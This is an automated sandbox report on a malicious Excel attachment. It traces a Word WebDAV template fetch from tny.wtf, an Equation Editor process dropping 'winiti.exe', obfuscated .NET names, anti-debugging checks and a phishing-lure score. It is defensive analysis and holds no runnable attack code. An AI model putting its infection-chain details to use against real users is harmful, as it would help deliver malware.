              Source: 8.2.winiti.exe.3c78a18.5.raw.unpack, lcS7RE1vxlKWGpOeGp.csHigh entropy of concatenated method names: 'fjxuJCUCli', 'dq1ugTkcZZ', 'EJZQtHZv8D', 'u8iQm7fjBo', 'OsiQdgLBYT', 'Vk0Qn4e2ZN', 'g41QbOGAnA', 'crmQ0smGQj', 'TbgQkCV0e7', 'lrBQ5rmLQK'
              Source: 8.2.winiti.exe.3c78a18.5.raw.unpack, xFiqCjOS4mObwnqG7R.csHigh entropy of concatenated method names: 'EWef5wVsd5', 'xe6fKbwBF5', 'BugfOnUpLC', 'Tr4fhmj2e8', 'tFUfiw3ttv', 'YkRftnX2kA', 'flRfmMV13s', 'zrxfddUVsX', 'huMfnDADst', 'KeEfbtM9ml'
              Source: 8.2.winiti.exe.3c78a18.5.raw.unpack, Y56XpTEtPmCWtAUcx3.csHigh entropy of concatenated method names: 'U8pAH8qC9a', 'WokAyxrwL0', 'pVHA7wDedL', 'Bf0Ai2yNdm', 'nb8AmoaJP1', 'axnAdW0LNQ', 'MnMAbQqBYV', 'y2AA0G89VI', 'bLHA5DVVLb', 'CvaAPVhmyn'
              Source: 8.2.winiti.exe.3c78a18.5.raw.unpack, LQj0kcVZN6Kkvud9DR.csHigh entropy of concatenated method names: 'kBFw66mWtE', 'B7GwrZi6Hs', 'RyswQONdkA', 'NpTwuBdRYb', 'Ky4w98ov2t', 'QPJwIcU4LH', 'EXnwvV5Qp0', 'cjTwLFHLEs', 'V4wwsfDKcM', 'LGmwRtLJ7Z'
              Source: 8.2.winiti.exe.3c78a18.5.raw.unpack, bwrRjVyKj1VL5wCXv7.csHigh entropy of concatenated method names: 'iY1QeRlEfE', 'm5QQMY9dij', 'a8YQHnI8hN', 'lXYQyoXebK', 'aORQfrLs1B', 'yjtQc8VJGv', 'reLQ4K6HWa', 'pIOQwbduJF', 'ohrQF3L0hf', 'hZcQNBfeDd'
              Source: 8.2.winiti.exe.3c78a18.5.raw.unpack, H5DbcuXYjlGQPm0xJ0.csHigh entropy of concatenated method names: 'TIb4VdT1Zs', 'lsn4aIZ8Yc', 'WNcwpPSt2a', 'rnSwjmF1qY', 'g484PPCBwC', 'W9b4KFOl7d', 'RaV4EFNPE6', 'WWT4OYqenO', 'bkb4hoJiVW', 'b1e4qNRTCs'
              Source: 8.2.winiti.exe.3c78a18.5.raw.unpack, IcQdK2rXYfyvqYcyHa.csHigh entropy of concatenated method names: 'Dispose', 'RUTj2JsCi3', 'myp8iJBlW1', 'sxyRRK7glw', 'bbQjaj0kcZ', 's6Kjzkvud9', 'ProcessDialogKey', 'wRw8paIl7X', 'Frh8jHoQ1r', 'Itr88wKgcI'
              Source: 8.2.winiti.exe.3c78a18.5.raw.unpack, QoOP4PjGKS5gfhE57SM.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'CqRNO2qJae', 'G9FNh3I2Q6', 'uKENqXoB2e', 'tSdNxrJjlJ', 'CacNS6aQwa', 'UqYNX9D6wT', 'EVsNTXaS2Y'
              Source: 8.2.winiti.exe.3c78a18.5.raw.unpack, qKgcIJaPN5xDIttQpD.csHigh entropy of concatenated method names: 'PhUFj2dX4W', 'rMPFGPNVBu', 'DieFBnJWiM', 'ohEF6jvGsm', 'j2yFrLss94', 'StLFudw3uP', 'HY8F9s9TbD', 'VwdwTdWKCp', 'AZ5wVEa7Lv', 'VmGw2q4NJb'
              Source: 8.2.winiti.exe.3c78a18.5.raw.unpack, hNFj00Hv45CTOkfqEI.csHigh entropy of concatenated method names: 'SfPrO1ssyo', 'NDPrhawp0e', 'y6irq2u9mD', 'bhYrx4PFV0', 'hFSrSDP4cF', 'NAOrXTfqy2', 'BUorTLsn5H', 'zTArVVaxqj', 'hfAr2On37F', 'N7Bra3OAps'
              Source: 8.2.winiti.exe.3c78a18.5.raw.unpack, Q8PlVd7gMYjm0S8vYt.csHigh entropy of concatenated method names: 'Bpq93aGmUj', 'wTb9rMKOoC', 'iEc9unbdAm', 'i7l9IxK5H5', 'WE19vTwTjM', 'o9duSioOL5', 'F7BuX3OclH', 'lMkuTfOuXB', 'rbUuVL16tg', 'BLWu25cIwA'
              Source: 8.2.winiti.exe.3c78a18.5.raw.unpack, OOABLIblxanx4dA8KG.csHigh entropy of concatenated method names: 'qy6I6v0QNP', 'UJ8IQvx2QP', 'U5VI9jiagd', 'F5i9aeIwTX', 'IXI9z4S0JK', 'wPHIpTNuN4', 'v3RIjSIcOj', 'TbfI8DkhQl', 'TRWIGOfZ1W', 'JxrIBmWZim'
              Source: 8.2.winiti.exe.3c78a18.5.raw.unpack, f3eVc2kPtPvNgZNKDL.csHigh entropy of concatenated method names: 'uYjIlyACNl', 'dglIoMtatC', 'JIEIZtIDvN', 'j5SIeI2paI', 'jcvIJofeoR', 'qqqIMkFXex', 'qHYIgkNh8t', 'nYQIHJPpp8', 'UIFIyVd8tV', 'RskI1u4ivF'
              Source: 8.2.winiti.exe.3c78a18.5.raw.unpack, XC3FVVqBJrFXgahDpX.csHigh entropy of concatenated method names: 'ToString', 'Q7hcPUyHH6', 'n2VciTvqHJ', 'DZActfCNLB', 'IrNcm0wRNs', 'LEbcd8cteg', 'YMEcnGOoEo', 'KF4cbxNwLp', 'uxvc0HdMAp', 'UDFckP4YiN'
              Source: 8.2.winiti.exe.ed0000.2.raw.unpack, zDIByBvZeeoTUlBtuI.csHigh entropy of concatenated method names: 'YqZG3WZfoU', 'MJWG6UQrm1', 'BlQGrky7yt', 'vkTGQsyJoY', 'pVQGuMnV3v', 'UCvG9Faxpm', 'y2kGI2HM7H', 'zwbGvr4qKP', 'zENGL4O6ne', 'TBGGsmgcN9'
              Source: 8.2.winiti.exe.ed0000.2.raw.unpack, QpyfwtBfq1mip1rA69.csHigh entropy of concatenated method names: 'ufQjINFj00', 'k45jvCTOkf', 'WKjjs1VL5w', 'wXvjR7LcS7', 'aOejfGpO8P', 'xVdjcgMYjm', 'BBNg38HtCFLXAi7NE9', 'DZWfXI6iRaiNNcunyW', 'BnojjVDJux', 'bw0jG5WTZn'
              Source: 8.2.winiti.exe.ed0000.2.raw.unpack, iIG0lTjpxEHhOQvkFer.csHigh entropy of concatenated method names: 'HyJFl8i0dF', 'pY9FoalJ2C', 'YXNFZuvCpK', 'gBBFehNV3G', 'os2FJX2BQF', 'Gt8FMW0mEa', 'LaNFg1rS6B', 'ivAFH0j6Bf', 'Eu1FywVVXp', 'g8yF1h9yd0'
              Source: 8.2.winiti.exe.ed0000.2.raw.unpack, g3uWXYxFNrFgfAVMbg.csHigh entropy of concatenated method names: 'Atr4sn5qik', 'NQG4RKODZr', 'ToString', 'QKX46Y1ZVt', 'uCq4rZKPV7', 'mhX4QeDgMS', 'b794uVdd6H', 'C5V49hb9hr', 'D9h4Ij5Vlm', 'v9a4voyumo'
              Source: 8.2.winiti.exe.ed0000.2.raw.unpack, SM8r4X8fVbB7QJOWqS.csHigh entropy of concatenated method names: 'qKaZAClxf', 'fDZewjihY', 'EX6MEAvLr', 'jJygcp4d8', 'LIVy1JOiD', 'KkP1NXW1P', 's7FjWIgvkZQ8uOxcA5', 'sGKX7cMUQXquQDk8mW', 'vrTWnplwZWPtXk9fHO', 'c2Hwggjt9'
              Source: 8.2.winiti.exe.ed0000.2.raw.unpack, raIl7X21rhHoQ1rmtr.csHigh entropy of concatenated method names: 'WFGw7LwYmy', 'CKZwi91L4Y', 'LOIwt8ZYXo', 'vOjwmA9TeZ', 'qFTwOyngwC', 'D4Dwdlo4jm', 'Next', 'Next', 'Next', 'NextBytes'
              Source: 8.2.winiti.exe.ed0000.2.raw.unpack, lcS7RE1vxlKWGpOeGp.csHigh entropy of concatenated method names: 'fjxuJCUCli', 'dq1ugTkcZZ', 'EJZQtHZv8D', 'u8iQm7fjBo', 'OsiQdgLBYT', 'Vk0Qn4e2ZN', 'g41QbOGAnA', 'crmQ0smGQj', 'TbgQkCV0e7', 'lrBQ5rmLQK'
              Source: 8.2.winiti.exe.ed0000.2.raw.unpack, xFiqCjOS4mObwnqG7R.csHigh entropy of concatenated method names: 'EWef5wVsd5', 'xe6fKbwBF5', 'BugfOnUpLC', 'Tr4fhmj2e8', 'tFUfiw3ttv', 'YkRftnX2kA', 'flRfmMV13s', 'zrxfddUVsX', 'huMfnDADst', 'KeEfbtM9ml'
              Source: 8.2.winiti.exe.ed0000.2.raw.unpack, Y56XpTEtPmCWtAUcx3.csHigh entropy of concatenated method names: 'U8pAH8qC9a', 'WokAyxrwL0', 'pVHA7wDedL', 'Bf0Ai2yNdm', 'nb8AmoaJP1', 'axnAdW0LNQ', 'MnMAbQqBYV', 'y2AA0G89VI', 'bLHA5DVVLb', 'CvaAPVhmyn'
              Source: 8.2.winiti.exe.ed0000.2.raw.unpack, LQj0kcVZN6Kkvud9DR.csHigh entropy of concatenated method names: 'kBFw66mWtE', 'B7GwrZi6Hs', 'RyswQONdkA', 'NpTwuBdRYb', 'Ky4w98ov2t', 'QPJwIcU4LH', 'EXnwvV5Qp0', 'cjTwLFHLEs', 'V4wwsfDKcM', 'LGmwRtLJ7Z'
              Source: 8.2.winiti.exe.ed0000.2.raw.unpack, bwrRjVyKj1VL5wCXv7.csHigh entropy of concatenated method names: 'iY1QeRlEfE', 'm5QQMY9dij', 'a8YQHnI8hN', 'lXYQyoXebK', 'aORQfrLs1B', 'yjtQc8VJGv', 'reLQ4K6HWa', 'pIOQwbduJF', 'ohrQF3L0hf', 'hZcQNBfeDd'
              Source: 8.2.winiti.exe.ed0000.2.raw.unpack, H5DbcuXYjlGQPm0xJ0.csHigh entropy of concatenated method names: 'TIb4VdT1Zs', 'lsn4aIZ8Yc', 'WNcwpPSt2a', 'rnSwjmF1qY', 'g484PPCBwC', 'W9b4KFOl7d', 'RaV4EFNPE6', 'WWT4OYqenO', 'bkb4hoJiVW', 'b1e4qNRTCs'
              Source: 8.2.winiti.exe.ed0000.2.raw.unpack, IcQdK2rXYfyvqYcyHa.csHigh entropy of concatenated method names: 'Dispose', 'RUTj2JsCi3', 'myp8iJBlW1', 'sxyRRK7glw', 'bbQjaj0kcZ', 's6Kjzkvud9', 'ProcessDialogKey', 'wRw8paIl7X', 'Frh8jHoQ1r', 'Itr88wKgcI'
              Source: 8.2.winiti.exe.ed0000.2.raw.unpack, QoOP4PjGKS5gfhE57SM.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'CqRNO2qJae', 'G9FNh3I2Q6', 'uKENqXoB2e', 'tSdNxrJjlJ', 'CacNS6aQwa', 'UqYNX9D6wT', 'EVsNTXaS2Y'
              Source: 8.2.winiti.exe.ed0000.2.raw.unpack, qKgcIJaPN5xDIttQpD.csHigh entropy of concatenated method names: 'PhUFj2dX4W', 'rMPFGPNVBu', 'DieFBnJWiM', 'ohEF6jvGsm', 'j2yFrLss94', 'StLFudw3uP', 'HY8F9s9TbD', 'VwdwTdWKCp', 'AZ5wVEa7Lv', 'VmGw2q4NJb'
              Source: 8.2.winiti.exe.ed0000.2.raw.unpack, hNFj00Hv45CTOkfqEI.csHigh entropy of concatenated method names: 'SfPrO1ssyo', 'NDPrhawp0e', 'y6irq2u9mD', 'bhYrx4PFV0', 'hFSrSDP4cF', 'NAOrXTfqy2', 'BUorTLsn5H', 'zTArVVaxqj', 'hfAr2On37F', 'N7Bra3OAps'
              Source: 8.2.winiti.exe.ed0000.2.raw.unpack, Q8PlVd7gMYjm0S8vYt.csHigh entropy of concatenated method names: 'Bpq93aGmUj', 'wTb9rMKOoC', 'iEc9unbdAm', 'i7l9IxK5H5', 'WE19vTwTjM', 'o9duSioOL5', 'F7BuX3OclH', 'lMkuTfOuXB', 'rbUuVL16tg', 'BLWu25cIwA'
              Source: 8.2.winiti.exe.ed0000.2.raw.unpack, OOABLIblxanx4dA8KG.csHigh entropy of concatenated method names: 'qy6I6v0QNP', 'UJ8IQvx2QP', 'U5VI9jiagd', 'F5i9aeIwTX', 'IXI9z4S0JK', 'wPHIpTNuN4', 'v3RIjSIcOj', 'TbfI8DkhQl', 'TRWIGOfZ1W', 'JxrIBmWZim'
              Source: 8.2.winiti.exe.ed0000.2.raw.unpack, f3eVc2kPtPvNgZNKDL.csHigh entropy of concatenated method names: 'uYjIlyACNl', 'dglIoMtatC', 'JIEIZtIDvN', 'j5SIeI2paI', 'jcvIJofeoR', 'qqqIMkFXex', 'qHYIgkNh8t', 'nYQIHJPpp8', 'UIFIyVd8tV', 'RskI1u4ivF'
              Source: 8.2.winiti.exe.ed0000.2.raw.unpack, XC3FVVqBJrFXgahDpX.csHigh entropy of concatenated method names: 'ToString', 'Q7hcPUyHH6', 'n2VciTvqHJ', 'DZActfCNLB', 'IrNcm0wRNs', 'LEbcd8cteg', 'YMEcnGOoEo', 'KF4cbxNwLp', 'uxvc0HdMAp', 'UDFckP4YiN'

              Persistence and Installation Behavior

              barindex
              Microsoft Office launches external ms-search protocol handler (WebDAV)
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \Device\RdpDr\;:1\tny.wtf\DavWWWRootJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \Device\RdpDr\;:1\tny.wtf\DavWWWRootJump to behavior
              AI detected suspicious Excel or Word document
              Source: Office documentLLM: Score: 9 Reasons: The screenshot contains a visually prominent image that appears to be a button or link, with the text 'This document is protected' under a Microsoft Office logo. This can mislead users into thinking they need to click to view the document. The text creates a sense of urgency or necessity to access the document, which is a common tactic in phishing attacks. The use of the Microsoft Office logo impersonates a well-known brand, adding to the credibility of the phishing attempt. The sense of urgency is directly connected to the prominent button-like image, increasing the likelihood of a user clicking on it.
              Office drops RTF file
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile dump: recreatednewthingswithentrienewprocesswhichwedidwithouthavingsuchagereatthigstodoever_______greatthingstohappened[1].doc.0.drJump to dropped file
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile dump: FFE27256.doc.3.drJump to dropped file
              Office viewer loads remote template
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXESection loaded: netapi32.dll and davhlpr.dll loadedJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\winiti[1].exeJump to dropped file
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\winiti.exeJump to dropped file
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: RFQ#51281AOLAI.xlsStream path 'MBD001BDE15/Package' entropy: 7.97230907292 (max. 8.0)
              Source: RFQ#51281AOLAI.xlsStream path 'Workbook' entropy: 7.99941847659 (max. 8.0)
              Source: 07330000.0.drStream path 'MBD001BDE15/Package' entropy: 7.96745742421 (max. 8.0)
              Source: 07330000.0.drStream path 'Workbook' entropy: 7.99939043223 (max. 8.0)
              Source: ~DF6D5A74146301A5A1.TMP.0.drStream path 'Package' entropy: 7.96745742421 (max. 8.0)
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
              Source: C:\Users\user\AppData\Roaming\winiti.exeMemory allocated: 2C0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\winiti.exeMemory allocated: 2870000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\winiti.exeMemory allocated: 3C0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\winiti.exeMemory allocated: 58C0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\winiti.exeMemory allocated: 5360000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\winiti.exeMemory allocated: 68C0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\winiti.exeMemory allocated: 78C0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00930101 rdtsc 9_2_00930101
              Source: C:\Users\user\AppData\Roaming\winiti.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2912Thread sleep time: -240000s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\winiti.exe TID: 3124Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\winiti.exe TID: 3148Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\winiti.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\winiti.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00930101 rdtsc 9_2_00930101
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00417A03 LdrLoadDll,9_2_00417A03
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008D0080 mov ecx, dword ptr fs:[00000030h]9_2_008D0080
